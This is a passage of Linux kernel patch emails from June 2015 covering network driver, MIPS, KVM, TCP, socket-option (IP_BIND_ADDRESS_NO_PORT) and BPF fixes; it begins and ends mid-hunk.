TP_RSS_PF_MAP_A); return pfmap; } @@ -3761,8 +3813,11 @@ u32 t4_read_rss_pf_mask(struct adapter *adapter) { u32 pfmask; - t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, - &pfmask, 1, TP_RSS_PF_MSK_A); + if (adapter->flags & FW_OK) + t4_fw_tp_pio_rw(adapter, &pfmask, 1, TP_RSS_PF_MSK_A, 1); + else + t4_read_indirect(adapter, TP_PIO_ADDR_A, TP_PIO_DATA_A, + &pfmask, 1, TP_RSS_PF_MSK_A); return pfmask; } @@ -6137,12 +6192,19 @@ int t4_init_tp_params(struct adapter *adap) /* Cache the adapter's Compressed Filter Mode and global Incress * Configuration. 
*/ - t4_read_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, - &adap->params.tp.vlan_pri_map, 1, - TP_VLAN_PRI_MAP_A); - t4_read_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, - &adap->params.tp.ingress_config, 1, - TP_INGRESS_CONFIG_A); + if (adap->flags & FW_OK) { + t4_fw_tp_pio_rw(adap, &adap->params.tp.vlan_pri_map, 1, + TP_VLAN_PRI_MAP_A, 1); + t4_fw_tp_pio_rw(adap, &adap->params.tp.ingress_config, 1, + TP_INGRESS_CONFIG_A, 1); + } else { + t4_read_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, + &adap->params.tp.vlan_pri_map, 1, + TP_VLAN_PRI_MAP_A); + t4_read_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, + &adap->params.tp.ingress_config, 1, + TP_INGRESS_CONFIG_A); + } /* Now that we have TP_VLAN_PRI_MAP cached, we can calculate the field * shift positions of several elements of the Compressed Filter Tuple From 513d1a1d1c6be58668188e44cdadcb43061dd43c Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Fri, 5 Jun 2015 14:36:33 +0530 Subject: [PATCH 735/872] cxgb4: Fix static checker warning The patch e85c9a7abfa4: ("cxgb4/cxgb4vf: Add code to calculate T5 BAR2 Offsets for SGE Queue Registers") from Dec 3, 2014, leads to the following static checker warning: drivers/net/ethernet/chelsio/cxgb4/t4_hw.c:5358 t4_bar2_sge_qregs() warn: should '(qid >> qpp_shift) << page_shift' be a 64 bit type? This patch fixes it Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index b4110988536d..fdda0f8c5a19 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -6053,7 +6053,7 @@ int t4_bar2_sge_qregs(struct adapter *adapter, * o The BAR2 Queue ID. * o The BAR2 Queue ID Offset into the BAR2 page. */ - bar2_page_offset = ((qid >> qpp_shift) << page_shift); + bar2_page_offset = ((u64)(qid >> qpp_shift) << page_shift); bar2_qid = qid & qpp_mask; bar2_qid_offset = bar2_qid * SGE_UDB_SIZE; From 755af33b00e99a323df534617a10aea05cba1830 Mon Sep 17 00:00:00 2001 From: Joshua Kinard Date: Tue, 2 Jun 2015 16:55:22 -0400 Subject: [PATCH 736/872] MIPS: c-r4k: Fix typo in probe_scache() Fixes a typo in arch/mips/mm/c-r4k.c's probe_scache(). Signed-off-by: Joshua Kinard Signed-off-by: Ralf Baechle --- arch/mips/mm/c-r4k.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/mm/c-r4k.c b/arch/mips/mm/c-r4k.c index 0dbb65a51ce5..2e03ab173591 100644 --- a/arch/mips/mm/c-r4k.c +++ b/arch/mips/mm/c-r4k.c @@ -1372,7 +1372,7 @@ static int probe_scache(void) scache_size = addr; c->scache.linesz = 16 << ((config & R4K_CONF_SB) >> 22); c->scache.ways = 1; - c->dcache.waybit = 0; /* does not matter */ + c->scache.waybit = 0; /* does not matter */ return 1; } From 5f35b9cd553fd64415b563497d05a563c988dbd6 Mon Sep 17 00:00:00 2001 From: James Hogan Date: Thu, 4 Jun 2015 13:25:27 +0100 Subject: [PATCH 737/872] MIPS: Fix enabling of DEBUG_STACKOVERFLOW Commit 334c86c494b9 ("MIPS: IRQ: Add stackoverflow detection") added kernel stack overflow detection, however it only enabled it conditional upon the preprocessor definition DEBUG_STACKOVERFLOW, which is never actually defined. The Kconfig option is called DEBUG_STACKOVERFLOW, which manifests to the preprocessor as CONFIG_DEBUG_STACKOVERFLOW, so switch it to using that definition instead. 
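For illustration only, a sketch that is not part of the patch (the helper name is made up): a bool Kconfig symbol named DEBUG_STACKOVERFLOW is only ever visible to C code through its generated CONFIG_-prefixed macro, so the unprefixed guard can never fire:

/* Sketch only: a Kconfig bool named DEBUG_STACKOVERFLOW is exported to C
 * as CONFIG_DEBUG_STACKOVERFLOW, defined to 1 when the option is enabled;
 * the unprefixed name is never defined, which is why the old
 * "#ifdef DEBUG_STACKOVERFLOW" guard was always compiled out. */
#ifdef CONFIG_DEBUG_STACKOVERFLOW
static inline int stack_overflow_checks_enabled(void) { return 1; }
#else
static inline int stack_overflow_checks_enabled(void) { return 0; }
#endif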
Fixes: 334c86c494b9 ("MIPS: IRQ: Add stackoverflow detection") Signed-off-by: James Hogan Cc: Ralf Baechle Cc: Adam Jiang Cc: linux-mips@linux-mips.org Cc: # 2.6.37+ Patchwork: http://patchwork.linux-mips.org/patch/10531/ Signed-off-by: Ralf Baechle --- arch/mips/kernel/irq.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/kernel/irq.c b/arch/mips/kernel/irq.c index 51f57d841662..3c8a18a00a65 100644 --- a/arch/mips/kernel/irq.c +++ b/arch/mips/kernel/irq.c @@ -109,7 +109,7 @@ void __init init_IRQ(void) #endif } -#ifdef DEBUG_STACKOVERFLOW +#ifdef CONFIG_DEBUG_STACKOVERFLOW static inline void check_stack_overflow(void) { unsigned long sp; From e1fb96e064e7157920f043f40ae801a5c18e57da Mon Sep 17 00:00:00 2001 From: Huacai Chen Date: Thu, 4 Jun 2015 14:53:47 +0800 Subject: [PATCH 738/872] MIPS: Loongson-3: Fix a cpu-hotplug issue in loongson3_ipi_interrupt() setup_per_cpu_areas() only sets up __per_cpu_offset[] for each possible cpu, but loongson_sysconf.nr_cpus can be greater than possible cpus (due to reserved_cpus_mask). So in loongson3_ipi_interrupt(), percpu access will touch the original variable in the .data..percpu section which has been freed. Without this patch, cpu-hotplug will cause memory corruption. Signed-off-by: Huacai Chen Cc: John Crispin Cc: Steven J. Hill Cc: linux-mips@linux-mips.org Cc: Fuxin Zhang Cc: Zhangjin Wu Patchwork: http://patchwork.linux-mips.org/patch/10524/ Signed-off-by: Ralf Baechle --- arch/mips/loongson/loongson-3/smp.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/loongson/loongson-3/smp.c b/arch/mips/loongson/loongson-3/smp.c index e3c68b5da18d..509877c6e9d9 100644 --- a/arch/mips/loongson/loongson-3/smp.c +++ b/arch/mips/loongson/loongson-3/smp.c @@ -272,7 +272,7 @@ void loongson3_ipi_interrupt(struct pt_regs *regs) if (action & SMP_ASK_C0COUNT) { BUG_ON(cpu != 0); c0count = read_c0_count(); - for (i = 1; i < loongson_sysconf.nr_cpus; i++) + for (i = 1; i < num_possible_cpus(); i++) per_cpu(core0_c0count, i) = c0count; } } From 8833bc308ba5d31e0a872346c0f63e9bb02dc611 Mon Sep 17 00:00:00 2001 From: Markos Chandras Date: Thu, 4 Jun 2015 11:56:13 +0100 Subject: [PATCH 739/872] MIPS: BPF: Fix stack pointer allocation Fix stack pointer offset which could potentially corrupt argument registers in the previous frame. The calculated offset reflects the size of all the registers we need to preserve, so there is no need for this erroneous subtraction. [ralf@linux-mips.org: Fixed conflict due to only applying this fix part of the entire series as part of 4.1 fixes.] Signed-off-by: Markos Chandras Cc: netdev@vger.kernel.org Cc: "David S. Miller" Cc: Alexei Starovoitov Cc: Daniel Borkmann Cc: Hannes Frederic Sowa Cc: linux-kernel@vger.kernel.org Cc: linux-mips@linux-mips.org Patchwork: http://patchwork.linux-mips.org/patch/10527/ Signed-off-by: Ralf Baechle --- arch/mips/net/bpf_jit.c | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/arch/mips/net/bpf_jit.c b/arch/mips/net/bpf_jit.c index 5d6139390bf8..e23fdf2a9c80 100644 --- a/arch/mips/net/bpf_jit.c +++ b/arch/mips/net/bpf_jit.c @@ -681,11 +681,7 @@ static unsigned int get_stack_depth(struct jit_ctx *ctx) sp_off += config_enabled(CONFIG_64BIT) ? (ARGS_USED_BY_JIT + 1) * RSIZE : RSIZE; - /* - * Subtract the bytes for the last registers since we only care about - * the location on the stack pointer. 
- */ - return sp_off - RSIZE; + return sp_off; } static void build_prologue(struct jit_ctx *ctx) From ed9244e6c534612d2b5ae47feab2f55a0d4b4ced Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Thu, 7 May 2015 14:47:50 +0200 Subject: [PATCH 740/872] MIPS: KVM: Do not sign extend on unsigned MMIO load Fix possible unintended sign extension in unsigned MMIO loads by casting to uint16_t in the case of mmio_needed != 2. Signed-off-by: Nicholas Mc Guire Reviewed-by: James Hogan Tested-by: James Hogan Cc: Gleb Natapov Cc: Paolo Bonzini Cc: kvm@vger.kernel.org Cc: linux-mips@linux-mips.org Cc: linux-kernel@vger.kernel.org Patchwork: https://patchwork.linux-mips.org/patch/9985/ Signed-off-by: Ralf Baechle --- arch/mips/kvm/emulate.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/kvm/emulate.c b/arch/mips/kvm/emulate.c index 4b50c5787e25..d5fa3eaf39a1 100644 --- a/arch/mips/kvm/emulate.c +++ b/arch/mips/kvm/emulate.c @@ -2409,7 +2409,7 @@ enum emulation_result kvm_mips_complete_mmio_load(struct kvm_vcpu *vcpu, if (vcpu->mmio_needed == 2) *gpr = *(int16_t *) run->mmio.data; else - *gpr = *(int16_t *) run->mmio.data; + *gpr = *(uint16_t *)run->mmio.data; break; case 1: From 90c337da1524863838658078ec34241f45d8394d Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Sat, 6 Jun 2015 21:17:57 -0700 Subject: [PATCH 741/872] inet: add IP_BIND_ADDRESS_NO_PORT to overcome bind(0) limitations When an application needs to force a source IP on an active TCP socket it has to use bind(IP, port=x). As most applications do not want to deal with already used ports, x is often set to 0, meaning the kernel is in charge to find an available port. But kernel does not know yet if this socket is going to be a listener or be connected. It has very limited choices (no full knowledge of final 4-tuple for a connect()) With limited ephemeral port range (about 32K ports), it is very easy to fill the space. This patch adds a new SOL_IP socket option, asking kernel to ignore the 0 port provided by application in bind(IP, port=0) and only remember the given IP address. The port will be automatically chosen at connect() time, in a way that allows sharing a source port as long as the 4-tuples are unique. This new feature is available for both IPv4 and IPv6 (Thanks Neal) Tested: Wrote a test program and checked its behavior on IPv4 and IPv6. strace(1) shows sequences of bind(IP=127.0.0.2, port=0) followed by connect(). Also getsockname() show that the port is still 0 right after bind() but properly allocated after connect(). 
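A minimal sketch of such a test program (illustrative only, not the author's actual code; error handling omitted, and the IP_BIND_ADDRESS_NO_PORT fallback value is taken from the uapi hunk below). The traces that follow were produced by this kind of calling sequence:

/* Minimal sketch, not the author's test program: pin the source IP with
 * bind() but let connect() pick the source port. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

#ifndef IP_BIND_ADDRESS_NO_PORT
#define IP_BIND_ADDRESS_NO_PORT 24	/* value from the uapi hunk below */
#endif

int main(void)
{
	int one = 1;
	int fd = socket(AF_INET, SOCK_STREAM, 0);
	struct sockaddr_in src = { .sin_family = AF_INET, .sin_port = htons(0) };
	struct sockaddr_in dst = { .sin_family = AF_INET, .sin_port = htons(80) };

	inet_pton(AF_INET, "127.0.0.2", &src.sin_addr);
	inet_pton(AF_INET, "127.0.0.3", &dst.sin_addr);

	/* IPPROTO_IP is the SOL_IP level shown in the traces below. */
	setsockopt(fd, IPPROTO_IP, IP_BIND_ADDRESS_NO_PORT, &one, sizeof(one));
	bind(fd, (struct sockaddr *)&src, sizeof(src));		/* port stays 0 */
	connect(fd, (struct sockaddr *)&dst, sizeof(dst));	/* port chosen here */
	return 0;
}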
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 5 setsockopt(5, SOL_IP, IP_BIND_ADDRESS_NO_PORT, [1], 4) = 0 bind(5, {sa_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("127.0.0.2")}, 16) = 0 getsockname(5, {sa_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("127.0.0.2")}, [16]) = 0 connect(5, {sa_family=AF_INET, sin_port=htons(53174), sin_addr=inet_addr("127.0.0.3")}, 16) = 0 getsockname(5, {sa_family=AF_INET, sin_port=htons(38050), sin_addr=inet_addr("127.0.0.2")}, [16]) = 0 IPv6 test : socket(PF_INET6, SOCK_STREAM, IPPROTO_IP) = 7 setsockopt(7, SOL_IP, IP_BIND_ADDRESS_NO_PORT, [1], 4) = 0 bind(7, {sa_family=AF_INET6, sin6_port=htons(0), inet_pton(AF_INET6, "::1", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, 28) = 0 getsockname(7, {sa_family=AF_INET6, sin6_port=htons(0), inet_pton(AF_INET6, "::1", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, [28]) = 0 connect(7, {sa_family=AF_INET6, sin6_port=htons(57300), inet_pton(AF_INET6, "::1", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, 28) = 0 getsockname(7, {sa_family=AF_INET6, sin6_port=htons(60964), inet_pton(AF_INET6, "::1", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, [28]) = 0 I was able to bind()/connect() a million concurrent IPv4 sockets, instead of ~32000 before patch. lpaa23:~# ulimit -n 1000010 lpaa23:~# ./bind --connect --num-flows=1000000 & 1000000 sockets lpaa23:~# grep TCP /proc/net/sockstat TCP: inuse 2000063 orphan 0 tw 47 alloc 2000157 mem 66 Check that a given source port is indeed used by many different connections : lpaa23:~# ss -t src :40000 | head -10 State Recv-Q Send-Q Local Address:Port Peer Address:Port ESTAB 0 0 127.0.0.2:40000 127.0.202.33:44983 ESTAB 0 0 127.0.0.2:40000 127.2.27.240:44983 ESTAB 0 0 127.0.0.2:40000 127.2.98.5:44983 ESTAB 0 0 127.0.0.2:40000 127.0.124.196:44983 ESTAB 0 0 127.0.0.2:40000 127.2.139.38:44983 ESTAB 0 0 127.0.0.2:40000 127.1.59.80:44983 ESTAB 0 0 127.0.0.2:40000 127.3.6.228:44983 ESTAB 0 0 127.0.0.2:40000 127.0.38.53:44983 ESTAB 0 0 127.0.0.2:40000 127.1.197.10:44983 Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller --- include/net/inet_sock.h | 1 + include/uapi/linux/in.h | 1 + net/ipv4/af_inet.c | 3 ++- net/ipv4/ip_sockglue.c | 7 +++++++ net/ipv6/af_inet6.c | 3 ++- 5 files changed, 13 insertions(+), 2 deletions(-) diff --git a/include/net/inet_sock.h b/include/net/inet_sock.h index b6c3737da4e9..47eb67b08abd 100644 --- a/include/net/inet_sock.h +++ b/include/net/inet_sock.h @@ -187,6 +187,7 @@ struct inet_sock { transparent:1, mc_all:1, nodefrag:1; + __u8 bind_address_no_port:1; __u8 rcv_tos; __u8 convert_csum; int uc_index; diff --git a/include/uapi/linux/in.h b/include/uapi/linux/in.h index 641338bef651..83d6236a2f08 100644 --- a/include/uapi/linux/in.h +++ b/include/uapi/linux/in.h @@ -112,6 +112,7 @@ struct in_addr { #define IP_MINTTL 21 #define IP_NODEFRAG 22 #define IP_CHECKSUM 23 +#define IP_BIND_ADDRESS_NO_PORT 24 /* IP_MTU_DISCOVER values */ #define IP_PMTUDISC_DONT 0 /* Never send DF frames */ diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c index 6ad0f7a711c9..cc858ef44451 100644 --- a/net/ipv4/af_inet.c +++ b/net/ipv4/af_inet.c @@ -488,7 +488,8 @@ int inet_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len) inet->inet_saddr = 0; /* Use device */ /* Make sure we are allowed to bind here. 
 */ - if (sk->sk_prot->get_port(sk, snum)) { + if ((snum || !inet->bind_address_no_port) && + sk->sk_prot->get_port(sk, snum)) { inet->inet_saddr = inet->inet_rcv_saddr = 0; err = -EADDRINUSE; goto out_release_sock; diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c index 7cfb0893f263..04ae2992a5cd 100644 --- a/net/ipv4/ip_sockglue.c +++ b/net/ipv4/ip_sockglue.c @@ -582,6 +582,7 @@ static int do_ip_setsockopt(struct sock *sk, int level, case IP_TRANSPARENT: case IP_MINTTL: case IP_NODEFRAG: + case IP_BIND_ADDRESS_NO_PORT: case IP_UNICAST_IF: case IP_MULTICAST_TTL: case IP_MULTICAST_ALL: @@ -732,6 +733,9 @@ static int do_ip_setsockopt(struct sock *sk, int level, } inet->nodefrag = val ? 1 : 0; break; + case IP_BIND_ADDRESS_NO_PORT: + inet->bind_address_no_port = val ? 1 : 0; + break; case IP_MTU_DISCOVER: if (val < IP_PMTUDISC_DONT || val > IP_PMTUDISC_OMIT) goto e_inval; @@ -1324,6 +1328,9 @@ static int do_ip_getsockopt(struct sock *sk, int level, int optname, case IP_NODEFRAG: val = inet->nodefrag; break; + case IP_BIND_ADDRESS_NO_PORT: + val = inet->bind_address_no_port; + break; case IP_MTU_DISCOVER: val = inet->pmtudisc; break; diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c index f3866c0b6cfe..7de52b65173f 100644 --- a/net/ipv6/af_inet6.c +++ b/net/ipv6/af_inet6.c @@ -362,7 +362,8 @@ int inet6_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len) np->saddr = addr->sin6_addr; /* Make sure we are allowed to bind here. */ - if (sk->sk_prot->get_port(sk, snum)) { + if ((snum || !inet->bind_address_no_port) && + sk->sk_prot->get_port(sk, snum)) { inet_reset_saddr(sk); err = -EADDRINUSE; goto out; From 6d7954130c8d7100b7aba3c986fc4eefedf1a1ad Mon Sep 17 00:00:00 2001 From: Hauke Mehrtens Date: Sat, 6 Jun 2015 22:07:23 +0200 Subject: [PATCH 742/872] rhashtable: add missing import rhashtable uses EXPORT_SYMBOL_GPL() without importing linux/export.h directly; it is only imported indirectly through some other includes. Signed-off-by: Hauke Mehrtens Signed-off-by: David S. Miller --- lib/rhashtable.c | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rhashtable.c b/lib/rhashtable.c index 4396434e4715..8609378e6505 100644 --- a/lib/rhashtable.c +++ b/lib/rhashtable.c @@ -26,6 +26,7 @@ #include #include #include +#include #define HASH_DEFAULT_SIZE 64UL #define HASH_MIN_SIZE 4U From c5726d26b8147030c394964aabfb5d36140c08ef Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Sat, 6 Jun 2015 10:41:17 +0200 Subject: [PATCH 743/872] wan: dscc4: fix build warning Wunused-but-set-variable Fix: drivers/net/wan/dscc4.c: In function 'dscc4_open': drivers/net/wan/dscc4.c:1049:25: warning: variable 'ppriv' set but not used [-Wunused-but-set-variable] This has been in there unused since 1da177e4c3f (Linux-2.6.12-rc2); simply remove it. Signed-off-by: Nicholas Mc Guire Signed-off-by: David S. 
Miller --- drivers/net/wan/dscc4.c | 3 --- 1 file changed, 3 deletions(-) diff --git a/drivers/net/wan/dscc4.c b/drivers/net/wan/dscc4.c index 08223569cebd..f76845de7aa8 100644 --- a/drivers/net/wan/dscc4.c +++ b/drivers/net/wan/dscc4.c @@ -1046,7 +1046,6 @@ static void dscc4_pci_reset(struct pci_dev *pdev, void __iomem *ioaddr) static int dscc4_open(struct net_device *dev) { struct dscc4_dev_priv *dpriv = dscc4_priv(dev); - struct dscc4_pci_priv *ppriv; int ret = -EAGAIN; if ((dscc4_loopback_check(dpriv) < 0)) @@ -1055,8 +1054,6 @@ static int dscc4_open(struct net_device *dev) if ((ret = hdlc_open(dev))) goto err; - ppriv = dpriv->pci_priv; - /* * Due to various bugs, there is no way to reliably reset a * specific port (manufacturer's dependent special PCI #RST wiring From 078b29d7e92e4254b6de16097d0369dde17efe21 Mon Sep 17 00:00:00 2001 From: "Lendacky, Thomas" Date: Fri, 5 Jun 2015 16:02:26 -0500 Subject: [PATCH 744/872] amd-xgbe: Use disable_irq_nosync from within timer function Since the Tx timer function runs in softirq context the driver needs to call disable_irq_nosync instead of a disable_irq. Reported-by: Josh Stone Signed-off-by: Tom Lendacky Signed-off-by: David S. Miller --- drivers/net/ethernet/amd/xgbe/xgbe-drv.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-drv.c b/drivers/net/ethernet/amd/xgbe/xgbe-drv.c index db84ddcfec84..9fd6c69a8bac 100644 --- a/drivers/net/ethernet/amd/xgbe/xgbe-drv.c +++ b/drivers/net/ethernet/amd/xgbe/xgbe-drv.c @@ -423,7 +423,7 @@ static void xgbe_tx_timer(unsigned long data) if (napi_schedule_prep(napi)) { /* Disable Tx and Rx interrupts */ if (pdata->per_channel_irq) - disable_irq(channel->dma_irq); + disable_irq_nosync(channel->dma_irq); else xgbe_disable_rx_tx_ints(pdata); From 908e80d6546813aaf8b546b4b4483fcec24190b6 Mon Sep 17 00:00:00 2001 From: Colin Ian King Date: Fri, 5 Jun 2015 19:19:11 +0100 Subject: [PATCH 745/872] fddi: print an address with %p format specifier rather than %x The debug is printing the struct smt_header * address using the %x format specifier. Fix it to use %p instead. Signed-off-by: Colin Ian King Signed-off-by: David S. Miller --- drivers/net/fddi/skfp/srf.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/fddi/skfp/srf.c b/drivers/net/fddi/skfp/srf.c index cc27dea3414e..9956680402de 100644 --- a/drivers/net/fddi/skfp/srf.c +++ b/drivers/net/fddi/skfp/srf.c @@ -414,7 +414,7 @@ static void smt_send_srf(struct s_smc *smc) smt->smt_len = SMT_MAX_INFO_LEN - pcon.pc_len ; mb->sm_len = smt->smt_len + sizeof(struct smt_header) ; - DB_SMT("SRF: sending SRF at %x, len %d\n",smt,mb->sm_len) ; + DB_SMT("SRF: sending SRF at %p, len %d\n",smt,mb->sm_len) ; DB_SMT("SRF: state SR%d Threshold %d\n", smc->srf.sr_state,smc->srf.SRThreshold/TICKS_PER_SECOND) ; #ifdef DEBUG From 98da81a426a76c351f3c2854d5bc31f17bba3194 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Thu, 4 Jun 2015 08:01:12 -0700 Subject: [PATCH 746/872] tcp: remove redundant checks II For same reasons than in commit 12e25e1041d0 ("tcp: remove redundant checks"), we can remove redundant checks done for timewait sockets. Signed-off-by: Eric Dumazet Signed-off-by: David S. 
Miller --- net/ipv4/tcp_ipv4.c | 4 ---- net/ipv6/tcp_ipv6.c | 4 ---- 2 files changed, 8 deletions(-) diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c index 3130c42240c8..d7d4c2b79cf2 100644 --- a/net/ipv4/tcp_ipv4.c +++ b/net/ipv4/tcp_ipv4.c @@ -1671,10 +1671,6 @@ int tcp_v4_rcv(struct sk_buff *skb) goto discard_it; } - if (skb->len < (th->doff << 2)) { - inet_twsk_put(inet_twsk(sk)); - goto bad_packet; - } if (tcp_checksum_complete(skb)) { inet_twsk_put(inet_twsk(sk)); goto csum_error; diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c index b72e1ffc6bb4..45a7176ed460 100644 --- a/net/ipv6/tcp_ipv6.c +++ b/net/ipv6/tcp_ipv6.c @@ -1467,10 +1467,6 @@ static int tcp_v6_rcv(struct sk_buff *skb) tcp_v6_fill_cb(skb, hdr, th); - if (skb->len < (th->doff<<2)) { - inet_twsk_put(inet_twsk(sk)); - goto bad_packet; - } if (tcp_checksum_complete(skb)) { inet_twsk_put(inet_twsk(sk)); goto csum_error; From 3431205e03977aaf32bce6d4b16fb8244b510056 Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Thu, 4 Jun 2015 10:11:53 -0700 Subject: [PATCH 747/872] bpf: make programs see skb->data == L2 for ingress and egress eBPF programs attached to ingress and egress qdiscs see inconsistent skb->data. For ingress L2 header is already pulled, whereas for egress it's present. This is known to program writers which are currently forced to use BPF_LL_OFF workaround. Since programs don't change skb internal pointers it is safe to do pull/push right around invocation of the program and earlier taps and later pt->func() will not be affected. Multiple taps via packet_rcv(), tpacket_rcv() are doing the same trick around run_filter/BPF_PROG_RUN even if skb_shared. This fix finally allows programs to use optimized LD_ABS/IND instructions without BPF_LL_OFF for higher performance. tc ingress + cls_bpf + samples/bpf/tcbpf1_kern.o w/o JIT w/JIT before 20.5 23.6 Mpps after 21.8 26.6 Mpps Old programs with BPF_LL_OFF will still work as-is. We can now undo most of the earlier workaround commit: a166151cbe33 ("bpf: fix bpf helpers to use skb->mac_header relative offsets") Signed-off-by: Alexei Starovoitov Acked-by: Jamal Hadi Salim Signed-off-by: David S. Miller --- net/core/filter.c | 26 +++----------------------- net/sched/act_bpf.c | 9 ++++++++- net/sched/cls_bpf.c | 16 +++++++++++++++- samples/bpf/tcbpf1_kern.c | 8 ++++---- 4 files changed, 30 insertions(+), 29 deletions(-) diff --git a/net/core/filter.c b/net/core/filter.c index 09b2062eb5b8..36a69e33d76b 100644 --- a/net/core/filter.c +++ b/net/core/filter.c @@ -1238,21 +1238,6 @@ int sk_attach_bpf(u32 ufd, struct sock *sk) return 0; } -/** - * bpf_skb_clone_not_writable - is the header of a clone not writable - * @skb: buffer to check - * @len: length up to which to write, can be negative - * - * Returns true if modifying the header part of the cloned buffer - * does require the data to be copied. I.e. this version works with - * negative lengths needed for eBPF case! 
- */ -static bool bpf_skb_clone_unwritable(const struct sk_buff *skb, int len) -{ - return skb_header_cloned(skb) || - (int) skb_headroom(skb) + len > skb->hdr_len; -} - #define BPF_RECOMPUTE_CSUM(flags) ((flags) & 1) static u64 bpf_skb_store_bytes(u64 r1, u64 r2, u64 r3, u64 r4, u64 flags) @@ -1275,9 +1260,8 @@ static u64 bpf_skb_store_bytes(u64 r1, u64 r2, u64 r3, u64 r4, u64 flags) if (unlikely((u32) offset > 0xffff || len > sizeof(buf))) return -EFAULT; - offset -= skb->data - skb_mac_header(skb); if (unlikely(skb_cloned(skb) && - bpf_skb_clone_unwritable(skb, offset + len))) + !skb_clone_writable(skb, offset + len))) return -EFAULT; ptr = skb_header_pointer(skb, offset, len, buf); @@ -1321,9 +1305,8 @@ static u64 bpf_l3_csum_replace(u64 r1, u64 r2, u64 from, u64 to, u64 flags) if (unlikely((u32) offset > 0xffff)) return -EFAULT; - offset -= skb->data - skb_mac_header(skb); if (unlikely(skb_cloned(skb) && - bpf_skb_clone_unwritable(skb, offset + sizeof(sum)))) + !skb_clone_writable(skb, offset + sizeof(sum)))) return -EFAULT; ptr = skb_header_pointer(skb, offset, sizeof(sum), &sum); @@ -1369,9 +1352,8 @@ static u64 bpf_l4_csum_replace(u64 r1, u64 r2, u64 from, u64 to, u64 flags) if (unlikely((u32) offset > 0xffff)) return -EFAULT; - offset -= skb->data - skb_mac_header(skb); if (unlikely(skb_cloned(skb) && - bpf_skb_clone_unwritable(skb, offset + sizeof(sum)))) + !skb_clone_writable(skb, offset + sizeof(sum)))) return -EFAULT; ptr = skb_header_pointer(skb, offset, sizeof(sum), &sum); @@ -1425,8 +1407,6 @@ static u64 bpf_clone_redirect(u64 r1, u64 ifindex, u64 flags, u64 r4, u64 r5) if (unlikely(!skb2)) return -ENOMEM; - skb_push(skb2, skb2->data - skb_mac_header(skb2)); - if (BPF_IS_REDIRECT_INGRESS(flags)) return dev_forward_skb(dev, skb2); diff --git a/net/sched/act_bpf.c b/net/sched/act_bpf.c index dc6a2d324bd8..1d56903fd4c7 100644 --- a/net/sched/act_bpf.c +++ b/net/sched/act_bpf.c @@ -37,6 +37,7 @@ static int tcf_bpf(struct sk_buff *skb, const struct tc_action *act, { struct tcf_bpf *prog = act->priv; int action, filter_res; + bool at_ingress = G_TC_AT(skb->tc_verd) & AT_INGRESS; if (unlikely(!skb_mac_header_was_set(skb))) return TC_ACT_UNSPEC; @@ -48,7 +49,13 @@ static int tcf_bpf(struct sk_buff *skb, const struct tc_action *act, /* Needed here for accessing maps. */ rcu_read_lock(); - filter_res = BPF_PROG_RUN(prog->filter, skb); + if (at_ingress) { + __skb_push(skb, skb->mac_len); + filter_res = BPF_PROG_RUN(prog->filter, skb); + __skb_pull(skb, skb->mac_len); + } else { + filter_res = BPF_PROG_RUN(prog->filter, skb); + } rcu_read_unlock(); /* A BPF program may overwrite the default action opcode. diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c index 91bd9c19471d..c79ecfd36e0f 100644 --- a/net/sched/cls_bpf.c +++ b/net/sched/cls_bpf.c @@ -64,6 +64,11 @@ static int cls_bpf_classify(struct sk_buff *skb, const struct tcf_proto *tp, { struct cls_bpf_head *head = rcu_dereference_bh(tp->root); struct cls_bpf_prog *prog; +#ifdef CONFIG_NET_CLS_ACT + bool at_ingress = G_TC_AT(skb->tc_verd) & AT_INGRESS; +#else + bool at_ingress = false; +#endif int ret = -1; if (unlikely(!skb_mac_header_was_set(skb))) @@ -72,7 +77,16 @@ static int cls_bpf_classify(struct sk_buff *skb, const struct tcf_proto *tp, /* Needed here for accessing maps. 
